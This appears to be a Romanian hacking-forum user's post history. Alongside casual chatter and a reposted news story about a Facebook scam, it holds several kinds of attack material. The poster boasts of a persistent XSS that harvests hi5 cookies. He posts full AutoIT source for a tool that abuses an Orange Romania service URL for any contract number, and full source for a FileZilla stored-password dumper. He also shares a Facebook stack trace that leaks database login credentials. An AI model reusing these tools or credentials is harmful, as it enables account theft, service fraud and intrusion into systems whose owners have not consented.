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Everything posted by Dragos
Ii dau _|_ celui care a sunat la Orange. chestia asta nu ma intereseaza prea tare... am XSS permanent in hi5 din care imi vin cookie-uri en-gros.
@fitty : Nu am nici o legatura cu ei. Sevex mi-a dat "bugul" in Orange si eu am facut program dupa el.
L-am primit si eu. Lavinia: foto http://ow.ly/28bYj?=http://www.facebook.com/photo.php Synthesis: vezi ca trimiti mass cu virusi Aveti grija ce mai downloadati.
gata, am editat postul principal
Creat de mine pentru sevex in jumatate de ora in AutoIT. Download Tutorial aici. VirusTotal Se poate sa fie detectat de AV deoarece este compilat cu UPX. Folositi-l pe propria raspundere. Sursa: #include <GUIConstantsEx.au3> #include <IE.au3> #notrayicon Opt('MustDeclareVars', 1) wua() Func wua() Local $msg, $exit, $emb, $gui, $go, $data, $data2, $home, $contulmeu, $despre $emb = _IECreateEmbedded () GUICreate("RoTunneling - WAP Unlimited Activator", @desktopwidth, @desktopheight) GuiSetBkColor (0x009966) GuiCtrlCreateLabel (" RoTunneling - WAP Unlimited Activator",0,0,@desktopwidth-10,15) GuiCtrlSetBkColor (-1,0x000000) GuiCtrlSetColor (-1,0xffffff) $exit = GuiCtrlCreateLabel ("X", @desktopwidth-10,0,10,15) GuiCtrlSetColor (-1,0xffffff) GuiCtrlSetBkColor (-1,0x000000) GuiCtrlCreateLabel ("Data:",@desktopwidth/2 - 130,30,25,40) $data = GuiCtrlCreateInput ("",@desktopwidth/2 - 100,30,100,17) $go = GuiCtrlCreateButton ("Activeaza WAP Unlimited", @desktopwidth/2 + 10,30,140,17) $gui = GUICtrlCreateObj($emb, 0, 60, @desktopwidth, @desktopheight-100) $home = GuiCtrlCreateButton ("Acasa", 10,@desktopheight - 30,70,20) $contulmeu = GuiCtrlCreateButton ("Contul meu",100,@desktopheight - 30, 70,20) $despre = GuiCtrlCreateButton ("Despre",190,@desktopheight - 30, 70,20) GuiCtrlCreateLabel ("de RoTunneling " & "a" & "n" & "d" & " ang3lblue" & @crlf & "Creat de Synthesis",@desktopwidth-170, @desktopheight-30,160,100,0x2) _IENavigate ($emb, "http://www.orange.ro/") GUISetState() While 1 $msg = GUIGetMsg() Select Case $msg = $GUI_EVENT_CLOSE Or $msg = $exit Exit Case $msg = $go $data2 = GuiCtrlRead ($data) _IENavigate ($emb, "https://www.orange.ro/webcare/webcare/owc_service_modify.jsp?service=WAPU&contract=" & $data2) Case $msg = $home _IENavigate ($emb, "http://www.orange.ro/") Case $msg = $contulmeu _IENavigate ($emb, "https://www.orange.ro/contul-meu") Case $msg = $despre _IENavigate ($emb, "https://www.orange.ro/servicii-iesite-din-oferta-orange/prepay/wapunlimited-ro.html") EndSelect WEnd GUIDelete() Exit EndFunc
Da-mi si mie un pm sa vad.
La liceu, matematica e nasoala. Totusi, daca eram atent la ore si nu ma jucam vaporasele cu colegul meu de banca, intelegeam si eu ceva. Cum zice si Nytro, matematica nu e grea, dar daca nu o inveti din timp, devine un chin.
Si eu am primit de la acelasi numar, si numarul meu de telefon nu-i decat la Google.. doar daca nu s-a trezit un amic sa-l dea mai departe.
Cum sa aflii parolele oamenilor care folosesc Firefox
Dragos replied to Kestor's topic in Tutoriale in romana
V-ati uitat macar asa de curiozitate la data ultimei postari? Post-hunt.. -
La cel de-al 300-lea post al meu, m-am gandit sa fac un wallpaper in Photoshop. Astept pareri..
Mersi pax. EDIT: Pentru idi... necunoscatori: Ce a postat pax defapt este un db mare cu date despre ziaristi EDIT 2 : Ca sa "decodati" ce a scris Pax in site-ul lui : <?php $url = "http://usadinspate.ro/plm/zz"; $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); $data = curl_exec($ch); curl_close($ch); $decode = base64_decode($data); echo $decode; ?>
Security researchers from Sophos warn that scammers are using a fake Target promotion to lure in Facebook users onto affiliate marketing websites. The spam messages promise the opportunity to shop for free at Target for a week. The rogue messages read "Target Week, SHOP For Free This Week Only!!" and include links to an external website. To entice users into clicking on the link as soon as possible, the message also claims that the "Promotion Ends Shortly." The first landing page in this scam informs users they need a special gift card to take part in the promotion. To obtain this card, they are required to perform a few steps, the first of which involves hitting a Facebook Like button, which will propagate the spam message through their profile. The second step involves signing up for a different offer on another website. This also asks users to provide some personal details about themselves like real name, email address, gender, age and the country they reside in. After users freely hand out all this information that will most likely later be used for email spamming purposes, they are presented with even more special deals. In order for these offers to appeal to each individual arriving on this page, they are tailored according to the details inputted in the previous form. "This is a typical bait-and-switch scam, where you are lured in with the promise of one thing – in this case, a week's free shopping at Target – but are then presented with a completely different series of offers," Paul Ducklin, Sophos' head of technology for the Asia Pacific region, explains. According to him, thousands of Facebook users have already fallen for the trick. Unfortunately, despite Facebook's best efforts to prevent spam, this type of affiliate marketing scams constantly find their way onto the social networking website. Just a few days ago, security researchers from Zscaler warned about a similar campaign promising free iPads for people who were willing to participate in a beta testing program. Sursa : http://news.softpedia.com/news/Facebook-Affiliate-Marketing-Scam-Abuses-the-Target-Brand-145810.shtml
YouTube - Ia de la B?sescu!!! Atata timp cat banii de la FMI se duc in decoratii, nu ajungem nicaieri.
Mersi AhEaD pentru XSS! Dau o bere!
Daca ii foloseste cuiva.. array ( 0 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/db/queryf.php', 'line' => 852, 'function' => 'handle_serious_mysql_failure', 'args' => array ( 0 => '/* /onthefarm/giftaccept.php?reqType=yes 11033 100000236725512 */ SELECT timestamp FROM insights_staging_success_time WHERE timestamp IN ()', ), ), 1 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/db/queryfx.php', 'line' => 46, 'function' => 'queryf_common', 'args' => array ( 0 => NULL, 1 => managed_connection::__set_state(array( 'conn' => NULL, 'connect_fcn' => '_get_db_managed_cb', 'params' => array ( 'ip' => '', 'db_name' => 'insights', 'user' => 'mark', 'pass' => 'e5p0nd4', 'mode' => 'r', 'port' => 3306, 'cleanup' => false, 'num_retries' => 3, 'log_after_num_retries' => 4, 'reason' => 'insights', 'cdb' => true, 'flags' => 0, 'is_shadow' => false, 'backoff_retry' => false, ), 'update_fcn' => NULL, 'shadow_fcn' => array ( 0 => 'ShadowDB', 1 => 'shadow_db_match', ), 'shadow_db_options' => ShadowDbOptions::__set_state(array( 'enabled' => false, 'db_name' => NULL, 'shadows' => array ( ), 'shadow_ports' => array ( ), )), 'ongoing_transaction' => false, 'trying_commit' => false, 'transaction_mc_keys' => array ( ), 'reconnectOnInterrupt' => true, 'lastErrno' => NULL, 'lastError' => NULL, 'name_' => '', )), 2 => '%Q', 3 => 'SELECT timestamp FROM insights_staging_success_time WHERE timestamp IN ()', ), ), 2 => array ( 'function' => 'queryfx_with_flags', 'args' => array ( 0 => NULL, 1 => managed_connection::__set_state(array( 'conn' => NULL, 'connect_fcn' => '_get_db_managed_cb', 'params' => array ( 'ip' => '', 'db_name' => 'insights', 'user' => 'mark', 'pass' => 'e5p0nd4', 'mode' => 'r', 'port' => 3306, 'cleanup' => false, 'num_retries' => 3, 'log_after_num_retries' => 4, 'reason' => 'insights', 'cdb' => true, 'flags' => 0, 'is_shadow' => false, 'backoff_retry' => false, ), 'update_fcn' => NULL, 'shadow_fcn' => array ( 0 => 'ShadowDB', 1 => 'shadow_db_match', ), 'shadow_db_options' => ShadowDbOptions::__set_state(array( 'enabled' => false, 'db_name' => NULL, 'shadows' => array ( ), 'shadow_ports' => array ( ), )), 'ongoing_transaction' => false, 'trying_commit' => false, 'transaction_mc_keys' => array ( ), 'reconnectOnInterrupt' => true, 'lastErrno' => NULL, 'lastError' => NULL, 'name_' => '', )), 2 => 'SELECT timestamp FROM insights_staging_success_time WHERE timestamp IN ()', ), ), 3 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/db/queryfx.php', 'line' => 25, 'function' => 'call_user_func_array', 'args' => array ( 0 => 'queryfx_with_flags', 1 => array ( 0 => NULL, 1 => managed_connection::__set_state(array( 'conn' => NULL, 'connect_fcn' => '_get_db_managed_cb', 'params' => array ( 'ip' => '', 'db_name' => 'insights', 'user' => 'mark', 'pass' => 'e5p0nd4', 'mode' => 'r', 'port' => 3306, 'cleanup' => false, 'num_retries' => 3, 'log_after_num_retries' => 4, 'reason' => 'insights', 'cdb' => true, 'flags' => 0, 'is_shadow' => false, 'backoff_retry' => false, ), 'update_fcn' => NULL, 'shadow_fcn' => array ( 0 => 'ShadowDB', 1 => 'shadow_db_match', ), 'shadow_db_options' => ShadowDbOptions::__set_state(array( 'enabled' => false, 'db_name' => NULL, 'shadows' => array ( ), 'shadow_ports' => array ( ), )), 'ongoing_transaction' => false, 'trying_commit' => false, 'transaction_mc_keys' => array ( ), 'reconnectOnInterrupt' => true, 'lastErrno' => NULL, 'lastError' => NULL, 'name_' => '', )), 2 => 'SELECT timestamp FROM insights_staging_success_time WHERE timestamp IN ()', ), ), ), 4 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/insights/data/data.php', 'line' => 257, 'function' => 'queryfx', 'args' => array ( 0 => managed_connection::__set_state(array( 'conn' => NULL, 'connect_fcn' => '_get_db_managed_cb', 'params' => array ( 'ip' => '', 'db_name' => 'insights', 'user' => 'mark', 'pass' => 'e5p0nd4', 'mode' => 'r', 'port' => 3306, 'cleanup' => false, 'num_retries' => 3, 'log_after_num_retries' => 4, 'reason' => 'insights', 'cdb' => true, 'flags' => 0, 'is_shadow' => false, 'backoff_retry' => false, ), 'update_fcn' => NULL, 'shadow_fcn' => array ( 0 => 'ShadowDB', 1 => 'shadow_db_match', ), 'shadow_db_options' => ShadowDbOptions::__set_state(array( 'enabled' => false, 'db_name' => NULL, 'shadows' => array ( ), 'shadow_ports' => array ( ), )), 'ongoing_transaction' => false, 'trying_commit' => false, 'transaction_mc_keys' => array ( ), 'reconnectOnInterrupt' => true, 'lastErrno' => NULL, 'lastError' => NULL, 'name_' => '', )), 1 => 'SELECT timestamp FROM insights_staging_success_time WHERE timestamp IN ()', ), ), 5 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/datatype/base.php', 'line' => 704, 'function' => 'fetch', 'class' => 'InsightsDataLoadedDataType', 'object' => InsightsDataLoadedDataType::__set_state(array( 'cachekeyMap' => array ( 1277362800 => 'insights.valid_date:1277362800:1277906400', 1277449200 => 'insights.valid_date:1277449200:1277906700', 1277535600 => 'insights.valid_date:1277535600:1277907000', 1277622000 => 'insights.valid_date:1277622000:1277907300', 1277708400 => 'insights.valid_date:1277708400:1277907600', 1277794800 => 'insights.valid_date:1277794800:1277907900', 1277881200 => 'insights.valid_date:1277881200:1277908200', 0 => 'insights.valid_date::1277899200', ), 'useAPC' => false, 'sources' => array ( 0 => 'memcache', 1 => 'custom', ), 'cachedData' => array ( 1277362800 => false, 1277449200 => false, 1277535600 => false, 1277622000 => false, 1277708400 => false, 1277794800 => false, 1277881200 => false, ), 'newKeys' => array ( ), 'pendingKeys' => array ( 0 => false, ), 'contextArgs' => array ( ), 'contextArgsDef' => array ( ), 'uniqueKey' => 'InsightsDataLoadedDataTypea:0:{}', 'sourcesByKeys' => array ( 'memcache' => 0, 'custom' => 1, ), )), 'type' => '->', 'args' => array ( 0 => array ( 0 => false, ), ), ), 6 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/datatype/base.php', 'line' => 366, 'function' => 'customFetch', 'class' => 'CoreDataType', 'object' => InsightsDataLoadedDataType::__set_state(array( 'cachekeyMap' => array ( 1277362800 => 'insights.valid_date:1277362800:1277906400', 1277449200 => 'insights.valid_date:1277449200:1277906700', 1277535600 => 'insights.valid_date:1277535600:1277907000', 1277622000 => 'insights.valid_date:1277622000:1277907300', 1277708400 => 'insights.valid_date:1277708400:1277907600', 1277794800 => 'insights.valid_date:1277794800:1277907900', 1277881200 => 'insights.valid_date:1277881200:1277908200', 0 => 'insights.valid_date::1277899200', ), 'useAPC' => false, 'sources' => array ( 0 => 'memcache', 1 => 'custom', ), 'cachedData' => array ( 1277362800 => false, 1277449200 => false, 1277535600 => false, 1277622000 => false, 1277708400 => false, 1277794800 => false, 1277881200 => false, ), 'newKeys' => array ( ), 'pendingKeys' => array ( 0 => false, ), 'contextArgs' => array ( ), 'contextArgsDef' => array ( ), 'uniqueKey' => 'InsightsDataLoadedDataTypea:0:{}', 'sourcesByKeys' => array ( 'memcache' => 0, 'custom' => 1, ), )), 'type' => '->', 'args' => array ( ), ), 7 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/datatype/base.php', 'line' => 619, 'function' => 'enqueue', 'class' => 'CoreDataType', 'object' => InsightsDataLoadedDataType::__set_state(array( 'cachekeyMap' => array ( 1277362800 => 'insights.valid_date:1277362800:1277906400', 1277449200 => 'insights.valid_date:1277449200:1277906700', 1277535600 => 'insights.valid_date:1277535600:1277907000', 1277622000 => 'insights.valid_date:1277622000:1277907300', 1277708400 => 'insights.valid_date:1277708400:1277907600', 1277794800 => 'insights.valid_date:1277794800:1277907900', 1277881200 => 'insights.valid_date:1277881200:1277908200', 0 => 'insights.valid_date::1277899200', ), 'useAPC' => false, 'sources' => array ( 0 => 'memcache', 1 => 'custom', ), 'cachedData' => array ( 1277362800 => false, 1277449200 => false, 1277535600 => false, 1277622000 => false, 1277708400 => false, 1277794800 => false, 1277881200 => false, ), 'newKeys' => array ( ), 'pendingKeys' => array ( 0 => false, ), 'contextArgs' => array ( ), 'contextArgsDef' => array ( ), 'uniqueKey' => 'InsightsDataLoadedDataTypea:0:{}', 'sourcesByKeys' => array ( 'memcache' => 0, 'custom' => 1, ), )), 'type' => '->', 'args' => array ( 0 => 'memcache', ), ), 8 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/cache/manager.php', 'line' => 132, 'function' => 'cacheCallbackByID', 'class' => 'CoreDataType', 'object' => InsightsDataLoadedDataType::__set_state(array( 'cachekeyMap' => array ( 1277362800 => 'insights.valid_date:1277362800:1277906400', 1277449200 => 'insights.valid_date:1277449200:1277906700', 1277535600 => 'insights.valid_date:1277535600:1277907000', 1277622000 => 'insights.valid_date:1277622000:1277907300', 1277708400 => 'insights.valid_date:1277708400:1277907600', 1277794800 => 'insights.valid_date:1277794800:1277907900', 1277881200 => 'insights.valid_date:1277881200:1277908200', 0 => 'insights.valid_date::1277899200', ), 'useAPC' => false, 'sources' => array ( 0 => 'memcache', 1 => 'custom', ), 'cachedData' => array ( 1277362800 => false, 1277449200 => false, 1277535600 => false, 1277622000 => false, 1277708400 => false, 1277794800 => false, 1277881200 => false, ), 'newKeys' => array ( ), 'pendingKeys' => array ( 0 => false, ), 'contextArgs' => array ( ), 'contextArgsDef' => array ( ), 'uniqueKey' => 'InsightsDataLoadedDataTypea:0:{}', 'sourcesByKeys' => array ( 'memcache' => 0, 'custom' => 1, ), )), 'type' => '->', 'args' => array ( 0 => array ( ), ), ), 9 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/cache/manager.php', 'line' => 67, 'function' => 'goLegacy', 'class' => 'CacheManager', 'object' => CacheManager::__set_state(array( 'pending' => array ( ), )), 'type' => '->', 'args' => array ( ), ), 10 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/datatype/base.php', 'line' => 396, 'function' => 'go', 'class' => 'CacheManager', 'object' => CacheManager::__set_state(array( 'pending' => array ( ), )), 'type' => '->', 'args' => array ( ), ), 11 => array ( 'function' => 'dispatch', 'class' => 'CoreDataType', 'type' => '::', 'args' => array ( ), ), 12 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/cache/scb.php', 'line' => 641, 'function' => 'call_user_func', 'args' => array ( 0 => array ( 0 => 'CoreDataType', 1 => 'dispatch', ), ), ), 13 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/cache/Preparer.php', 'line' => 281, 'function' => 'memcache_dispatch', 'args' => array ( ), ), 14 => array ( 'file' => '/var/releases/thefacebook-r257680-06202010/www/flib/core/cache/Preparer.php', 'line' => 233, 'function' => '_go', 'class' => 'Preparer', 'object' => Preparer::__set_state(array( 'nextIndex' => 2, 'currentPreparables' => array ( 1 => InsightsQuery::__set_state(array( 'oids' => array ( 0 => 102452128776, ), 'dates' => array ( 0 => false, ), 'metric' => InsightsMetricList::__set_state(array( 'metrics' => array ( 540436 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 540436, 'description' => '', )), 563489 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563489, 'description' => '', )), 563490 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563490, 'description' => '', )), 563491 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563491, 'description' => '', )), ), 'id' => 0, 'description' => '', )), 'datapoints' => array ( 0 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 540436, )), 1 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563489, )), 2 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563490, )), 3 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563491, )), ), 'data' => NULL, '__index' => 1, '__next' => 1, '__state' => 2, '__preparer' => Preparer::__set_state(array( 'nextIndex' => 2, 'currentPreparables' => array ( 1 => InsightsQuery::__set_state(array( 'oids' => array ( 0 => 102452128776, ), 'dates' => array ( 0 => false, ), 'metric' => InsightsMetricList::__set_state(array( 'metrics' => array ( 540436 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 540436, 'description' => '', )), 563489 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563489, 'description' => '', )), 563490 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563490, 'description' => '', )), 563491 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563491, 'description' => '', )), ), 'id' => 0, 'description' => '', )), 'datapoints' => array ( 0 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 540436, )), 1 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563489, )), 2 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563490, )), 3 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563491, )), ), 'data' => NULL, '__index' => 1, '__next' => 1, '__state' => 2, '__preparer' => Preparer::__set_state(array( 'nextIndex' => 2, 'currentPreparables' => array ( 1 => InsightsQuery::__set_state(array( 'oids' => array ( 0 => 102452128776, ), 'dates' => array ( 0 => false, ), 'metric' => InsightsMetricList::__set_state(array( 'metrics' => array ( 540436 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 540436, 'description' => '', )), 563489 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563489, 'description' => '', )), 563490 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563490, 'description' => '', )), 563491 => InsightsMetricInteger::__set_state(array( 'type' => 'InsightsDataPointInteger', 'id' => 563491, 'description' => '', )), ), 'id' => 0, 'description' => '', )), 'datapoints' => array ( 0 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 540436, )), 1 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563489, )), 2 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563490, )), 3 => InsightsDataPointInteger::__set_state(array( 'oid' => 102452128776, 'date' => false, 'metric' => 563491, )), ), 'data' => NULL, '__index' => 1, '__next' => 1, '__state' => 2, '__preparer' => Preparer::__set_state(array(
Bine ai venit Cosmine!
OFF: In Brasov a plouat timp de 2 saptamani si acum e soare. Deja mie dor de ploaie. ON: Pentru a "hecui" un site, trebuie sa ai habar despre vulnerabilitatile de tip XSS, SQLi, LFI, RFI etc. Programele doar cauta aceste vulnerabilitati pentru tine. Codul pentru a cauta vulnerabilitatea trebuie sa-l faci tu. In plus, nu te ajuta cu nimic faptul ca ai Ubuntu. Cel mai bun limbaj de programare pentru Linux este Ruby on Rails, dar trebuie sa stai sa-l inveti.
Ah da, am uitat sa mentionez. Un joc care mi-a placut foarte mult pe Windows 98 a fost Interstate 82, un joc gen San Andreas. Incearca-l
Curiozitatea a omorat pisica. ON : Imi placea foarte mult sa joc Prince of Persia si Lion King pe Win 98. Cred ca asta te-ar ajuta : Windows 98 Tips and Tricks
O sa incerc sa fac.
Synthesis's Filezilla Password Recoverer este un program cu ajutorul caruia poti recupera parolele de la Filezilla in caz ca le uiti. Utilitarul merge doar pe Windows XP. Download: megaupload.com/?d=T47NE811 Sursa (AutoIT) #include <GUIConstantsEx.au3> #include <string.au3> #NoTrayIcon #include <array.au3> Opt('MustDeclareVars', 1) filezillapr() Func filezillapr() Local $about, $recover, $i, $host, $user, $pass, $aaa Local $msg, $text, $sursa, $sursa2, $string, $i, $q, $a GUICreate("Synthesis's Filezilla Password Recoverer", 400, 200) $recover = GUICtrlCreateButton("Recover", 10, 10, 70, 20) $about = GuiCtrlCreateButton ("About",10,40,70,20) $aaa = GuiCtrlCreateButton ("Export",10,70,70,20) $text = GUICtrlCreateEdit ("", 100,10, 290, 180) GUISetState() While 1 $msg = GUIGetMsg() Select Case $msg = $GUI_EVENT_CLOSE ExitLoop Case $msg = $aaa $q = GuiCtrlRead ($text) If ($q <> "") Then If fileexists ("export.txt") Then filedelete ("export.txt") fileopen ("export.txt",1) filewrite ("export.txt", $q) fileclose ("export.txt") msgbox (64, "Done", "Your accounts were exported to export.txt.") Else fileopen ("export.txt",1) filewrite ("export.txt", $q) fileclose ("export.txt") msgbox (64, "Done", "Your accounts were exported to export.txt.") EndIf Else msgbox (16, "Error", "Recover your accounts and then export them.") EndIf Case $msg = $recover $a = guictrlread ($text) If ($a == "") Then If fileexists ("C:\Documents and Settings\" & @username & "\Application Data\FileZilla\recentservers.xml") Then fileopen ("C:\Documents and Settings\" & @username & "\Application Data\FileZilla\recentservers.xml",0) $sursa = fileread ("C:\Documents and Settings\" & @username & "\Application Data\FileZilla\recentservers.xml") fileclose ("C:\Documents and Settings\" & @username & "\Application Data\FileZilla\recentservers.xml") $sursa2 = _stringbetween ($sursa, '<Server>','</Server>') $string = "Synthesis's Filezilla Password Recoverer" & @crlf & "================================" & @crlf & @crlf $q = Ubound ($sursa2) While ($i < $q) $host = _StringBetween ($sursa2[$i], '<Host>', '</Host>') $user = _stringbetween ($sursa2[$i], '<User>','</User>') $pass = _stringbetween ($sursa2[$i], '<Pass>','</Pass>') $string = $string & "Website: " & $host[0] & @crlf & "Username: " & $user[0] & @crlf & "Password: " & $pass[0] & @crlf & @crlf $i = $i+1 Wend $string = $string & "================================" guictrlsetdata ($text, $string) Else msgbox (16, "Error", "Filezilla was not detected on your computer.") EndIf EndIf Case $msg = $about MsgBox(64, "About", "Synthesis's Filezilla Password Recoverer" & @crlf & "Tool coded for Windows XP" & @crlf & "Visit www.rstcenter.com for other tools.") EndSelect WEnd GUIDelete() Exit EndFunc
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